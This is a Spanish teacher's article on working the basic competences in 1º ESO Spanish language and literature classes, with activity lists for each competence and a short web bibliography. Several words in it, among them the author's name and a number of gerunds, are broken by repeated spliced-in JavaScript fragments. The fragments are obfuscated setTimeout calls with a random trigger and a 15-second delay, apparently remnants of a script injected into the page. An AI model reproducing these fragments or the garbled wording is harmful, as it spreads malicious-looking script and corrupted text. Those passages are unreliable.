ABORDAR Y TRABAJAR LAS COMPETENCIAS BÁSICAS EN LENGUA CASTELLANA Y LITERATURA DE 1º E.S.O.

Autora: Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andra Martínez Martín.

En este artículo se muestra cómo abordar las competencias básicas en primero de la E.S.O. para la materia de Lengua castellana y Literatura. Se pretende con ello ofrecer las pautas y procedimientos oportunos para el trabajo de todas las competencias básicas necesarias para la formación del alumnado en esta primera etapa.

Una de las primeras tareas a las que se enfrenta cada docente al iniciar el curso es la elaboración de las programaciones didácticas y, dentro de estas, la inclusión de la metodología en la cual debemos tener en cuenta los procedimientos que llevaremos a cabo para la inclusión de las competencias básicas. Además, en nuestras programaciones debemos aportar las actividades que desarrollaremos a lo largo del curso para que dichas competencias sean trabajadas y asimiladas por nuestro alumnado a medida que vamos impartiendo los contenidos curriculares propios de cada materia.

No siempre resulta una tarea sencilla puesto que las competencias básicas aún forman parte de una parcela dentro de nuestra enseñanza que parece vacilar, pues en mi opinión, aún no existe un consenso por parte de todos los miembros docentes para llevar a cabo un camino común en busca del progreso y del éxito de tales destrezas.

No debemos ignorar que las competencias básicas conforman hoy el esqueleto de nuestra metodología didáctica pero también debemos tener en cuenta que no se debe convertir en la ocupación principal de cada docente, ya que, una excesiva dedicación al encuentro de estas habilidades puede provocar una falta de interacción con la parte teórica de cada disciplina que debe constituir sin duda la base para los cimientos de toda formación de cada individuo.

A continuación, podrán observar las pautas y actividades necesarias destinadas a cada una de las competencias básicas y cómo vamos a trabajar la materia de Lengua castellana y Literatura con el objetivo de contribuir a la adquisición de estas destrezas en el primer curso de la E.S.O., por ser este el periodo de iniciación en las mismas:

Sin duda la competencia más relevante para nuestra materia es la competencia en comunicación lingüística: a través de la adquisición de dicha competencia nuestros alumnos podrán emplear y reflexionar de forma competente el funcionamiento del lenguaje, atributo esencial para la comunicación oral y escrita, tanto en lengua castellana como en otras lenguas y hacer uso del mismo en todas las áreas y en todos los ámbitos de la vida. Esta competencia está estrechamente ligada al resto de competencias, pues facilita la adquisición de las mismas. Para la adquisición y desarrollo de la competencia lingüística en 1º E.S.O. Seguiremos las siguientes pautas:

  • · Lectura de distintos textos (expositivos, argumentativos, literarios, de los medios de comunicación, etc.) seleccionados a lo largo del curso, bien empleandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando material fotocopiable así como los textos de los que disponemos a través del libro de texto.
  • · Lectura en voz alta de textos a lo largo de todo el curso así como la lectura y exposición de trabajos individuales o grupales como redacciones objetivas, creaciones literarias (poemas, cuentos…). También conseguiremos potenciar la competencia lingüística a través de los debates en clase.
  • · Lectura en voz alta de las distintas lecturas que se han seleccionado para este curso y que se han detallado en la presente programación.
  • · Realización de resúmenes.
  • · Diversidad de ejercicios para trabajar los contenidos de primer curso relacionados con el ámbito lingüístico: categorías gramaticales, ortografía, sintaxis, pragmática, etc.
  • · Comprensión y realización de textos a través de las distintas herramientas TICs de las que disponemos en el aula (Internet, procesador de textos, pizarra digital…).
  • · Pautas para la creación de textos literarios: cómo caracterizar un personaje, crear un escenario, realizar descripciones, seguir un orden determinado para la acción de una narración, etc.
  • · Revisión y autocorrección de las actividades por parte del alumno. Es muy importante que el alumno no sólo realice sus actividades, sino que las corrija y analice los errores que ha cometido, especialmente si se trata de errores ortográficos, en cuyo caso se puede pedir al alumno que emplee las palabras donde ha cometido fallos dentro de oraciones o un texto con el fin de solventar dichos “vicios” en la escritura.
  • · Realización de dictados: ya sean textos o dictados de palabras para trabajar grafías concretas.
  • · Pautas para breves para comentarios de texto adaptados al nivel del alumnado. Hemos detectado la necesidad de empezar a trabajar breves comentarios de texto para evitar carencias en los siguientes cursos ya que consideramos que es un objetivo que debemos conseguir trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando desde el primer ciclo de la E.S.O. Lógicamente los comentarios serán totalmente guiados a través de preguntas o esquemas, pero es vital que el alumno comience a tomar contacto con la unidad de texto, relacionarlo con el contexto y saber identificar elementos como quién es el emisor, quién es el receptor, así como comenzar a emplear algunos sencillos conectores discursivos para favorecer la redacción del alumno que en ocasiones queda bastante escasa y que si no se comienza a mejorar es muy posible que el alumno tienda a un mayor empobrecimiento con el paso del tiempo.

El éxito de la competencia lingüística se ve garantizada especialmente si trabajamos de forma paralela la competencia básica de “aprender a aprender” y esta a su vez mejora la adquisición del resto de competencias. Mediante esta competencia los alumnos pueden acceder a las pautas necesarias para la composición y  la construcción de conocimientos. Autodescubren sus habilidades y los métodos adecuados. Es necesario además que tengamos en cuenta que estos mecanismos deberían trabajarse al unísono desde todas las materias y perfeccionarlas en algunas de las horas destinadas a las tutorías.

Desde nuestra materia y para este curso seguiremos los siguientes mecanismos:

  • · Pautas para la realización de resúmenes: los contenidos que se aprovecharán para la creación de resúmenes serán aquellos que se van a trabajar en clase ya sea a través del libro de texto como de apuntes facilitados por el profesorado. Además, los alumnos realizarán breves resúmenes de las lecturas obligatorias que corresponden a este curso con el fin de comprobar que la lectura se está comprendiendo perfectamente y a su vez, trabajar la competencia lingüística.
  • · Realización de esquemas: los esquemas y los mapas conceptuales son una herramienta fundamental para la adquisición de conceptos y para presentar los contenidos de una forma clara y concisa, además de muy llamativa para el alumno.
  • · Revisión y autocorrección por parte del alumno de las actividades.
  • · Técnicas de estudio para la materia: es vital seguir un mismo ritmo a lo largo de todo el curso para que el alumno cree ciertos hábitos de estudio con respecto a la materia. Para ello, se recomienda hacer un examen oral por cada tema explicado, resumen y esquema de los contenidos del tema, recomendaciones de estudio y ejercicios prácticos orientados a cada examen… todo ello con el objetivo de facilitar al alumno la adquisición de los contenidos fundamentales y la superación de las distintas pruebas a lo largo de los trimestres.
  • · Pautas para la realización de lecturas en voz alta: cómo vocalizar correctamente, respirar adecuadamente, realizar pausas, entonar adecuadamente, etc.
  • · Pautas para la realización de debates: mecanismos como pedir la palabra, no utilizar palabras malsonantes, realizar argumentos adecuados, respetar los turnos de palabra, etc.
  • · Búsqueda en diccionarios y manuales (enciclopedias manuales o a través de Internet).
  • · Necesidad de hacer un seguimiento diario de las tareas de clase. La agenda de cada alumno supone una herramienta muy eficaz para que el alumno programe sus tareas. Les recomendaremos su uso y les animaremos a emplearla de forma correcta. Al mismo tiempo se convierte en un elemento fundamental con el que interactuar con los propios padres.
  • · Pautas para la utilización de las herramientas TICs: los alumnos trabajan los contenidos de lengua y literatura a través de material TIC como por ejemplo el ordenador. Será fundamental establecer unas normas de uso y cuidado de estos materiales así como de un uso moderado y adecuado de Internet.

Autonomía e iniciativa personal: la lengua contribuye al desarrollo de esta competencia aportandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la madurez del alumno necesaria desde una actitud crítica, reflexiva y participativa. Las pautas que vamos a seguir para la adquisición de dicha competencia serán:

  • · Debates.
  • · Exposición de trabajos.
  • · Creación de textos (literarios, expositivos, argumentativos…).
  • · Realización de resúmenes y de mapas conceptuales.
  • · Manifestación de juicios críticos ya sea de forma oral u escrita (opiniones personales de los textos leídos en clase).
  • · Revisión y cuidado del material del aula (los alumnos se hacen responsables de sus materiales).

La lengua es el instrumento que nos permite interrelacionarnos con el mundo, a interactuar con otras culturas; nuestra lengua colabora por lo tanto al desarrollo de la competencia social y ciudadana haciendo de nuestros alumnos individuos tolerantes y respetuosos y estas actitudes se reflejan en el comportamiento del propio lenguaje. Cómo vamos a desarrollar dicha competencia:

  • · Asimilación de hábitos de comportamiento para favorecer un clima adecuado dentro del aula.
  • · Realización de trabajos en parejas o en grupos.
  • · Lectura de textos diversos para tratar los temas transversales y realizar debates sobre ellos con el fin de favorecer una actitud responsable ante las distintas situaciones reales que se manifiestan en nuestra sociedad.
  • · Pautas para la realización de debates (pedir la palabra, moderar, respetar la opinión del “contrario”, etc.).

Competencia artística y cultural: es obvio que nuestra materia contribuye al desarrollo de esta competencia ya que, es a través de la lectura, la interpretación y la valoración de las obras literarias donde nuestros alumnos toman contacto con otras tradiciones, manifestaciones artísticas, valores y costumbres propios de otras culturas o de la suya propia.

  • · Lecturas obligatorias seleccionadas para el presente curso.
  • · Selección de textos relacionados con los distintos ámbitos de la sociedad, de las distintas épocas de la historia universal, hechos culturales importantes, personajes, obras y autores fundamentales de la literatura universal, etc. De igual modo, trabajaremos en clase textos de autores extremeños y textos relacionados con el ámbito sociocultural extremeño.
  • · Visita a la Biblioteca Estatal de Mérida.
  • · Realización de murales relacionados con la literatura.
  • · Actividades extraescolares que se indican en la presente programación.
  • · Conocimiento de fechas imprescindibles relacionadas con el ámbito de la cultura, como por ejemplo el Día del Libro.

Tratamiento de la información y competencia digital: tengamos en cuenta que medios tecnológicos como Internet a través del ordenador nos ofrecen multitud de posibilidades para la búsqueda de información, la investigación, la realización de tareas interactivas, lecturas, o incluso manifestación de creaciones propias a través de un blog, foros, páginas web. Existen también multitud de programas como correctores ortográficos, programa de resumen de textos, elaboración de cómics, montaje de imagen y sonido, etc. Los materiales TICs nos permiten un sin fin de posibilidades para trabajar en el aula. Para la adquisición de esta competencia podemos realizar las siguientes tareas:

  • · Creación de textos con procesador de texto.
  • · Visitas guiadas a páginas webs y blogs como: Enséñame la lengua, Cervantes Virtual, Aula en Marcha, etc.
  • · Actividades con Hot Potatoes, Web Quest, etc.
  • · Creación de materiales propios como un blog o página web con Kompozer o Medellín.
  • · Empleo de diccionarios o enciclopedias.
  • · Lectura y creación de noticias, artículos de opinión y textos relacionados con la publicidad.
  • · Empleo de la pizarra digital.
  • · Entrega de trabajos a ordenador.
  • · Posibilidad de emplear correo electrónico para el envío y recepción de trabajos.
  • · Uso de la Plataforma Rayuela.
  • · Aprender a hacer un buen uso de los materiales TICs y conocer los posibles peligros que se pueden encontrar en la red (cómo emplear las redes sociales sin peligro). Es vital inculcar a los alumnos que deben hacer un consumo responsable de Internet.
  • · Revisión diaria de los ordenadores por parte de los alumnos (hay que enseñar a los alumnos que son responsables de sus materiales y que el aprovechamiento de los mismos  debe ser lo más eficiente posible).

A lo largo del curso nos responsabilizamos de que nuestros alumnos alcancen a través de la Lengua y la Literatura la competencia en el conocimiento y la interacción con el mundo físico y la competencia matemática.  A pesar de que estas competencias puedan parecer lejanas a nuestra materia, la lengua permite interpretar el mundo que nos rodea y manifestar dichas interpretaciones oralmente o por escrito, defendiendo su cuidado, el mantenimiento del equilibrio natural… Durante el transcurso de este año leeremos textos relacionados con la ecología y trataremos de que nuestros alumnos adquieran un comportamiento responsable hacia la naturaleza y todo el contexto en general que nos rodea (pautas de comportamiento que se verán reforzadas en las actividades fuera del centro). Por otro lado, el lenguaje es vehículo de ideas y por lo tanto imprescindible para el uso del lenguaje matemático, contribuyendo al desarrollo del pensamiento científico y matemático , por lo que a través de los siguientes mecanismos propiciaremos también la consecución de esta competencia:

  • · Elaboración de esquemas.
  • · Elaboración de mapas conceptuales.
  • · Realización de cuadros que simplifiquen contenidos como: categorías gramaticales, elementos de la comunicación, tipos de texto, etc.
  • · Realización de simples análisis sintácticos empleandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el dibujo lineal y el concepto “arquitectónico” de los mismos.
  • · Juegos de palabras, crucigramas, etc.
  • · Conocimiento de los números romanos.
  • · Conocimiento de los siglos para la realización de mapas conceptuales en orden cronológico.
  • · Esquemas métricos (el alumno aprenderá en este curso a contar las sílabas de los versos y conocer el nombre de los mismos según el cómputo silábico. A su vez, conocerá los distintos tipos de poemas existentes en la literatura según la combinación de determinados versos y estrofas).
  • · Conocimiento de las reglas generales de acentuación para las cuales es preciso separar correctamente las sílabas e identificar la sílaba tónica.

Es preciso tener en cuenta que las competencias básicas se van a trabajar a lo largo de todo el curso. Por ello no podemos establecer una temporalización rígida de las mismas. Además, como puede observarse, se trabajan de forma conjunta ya que están interrelacionadas y, en ocasiones, la asimilación de una permite la consecución del resto (tal y como ocurre con la competencia lingüística o la competencia de aprender a aprender). Asimismo, no podemos descuidar que el desarrollo y la asimilación de las competencias básicas deben partir de un trabajo conjunto desde todos los miembros del departamento, pues, partiendo de unas pautas comunes podemos favorecer su adquisición  de una forma más rápida y eficaz.

Webgrafía:

http://vozdelaula.blogspot.com

http://ensenamelalengua.wodpress.com

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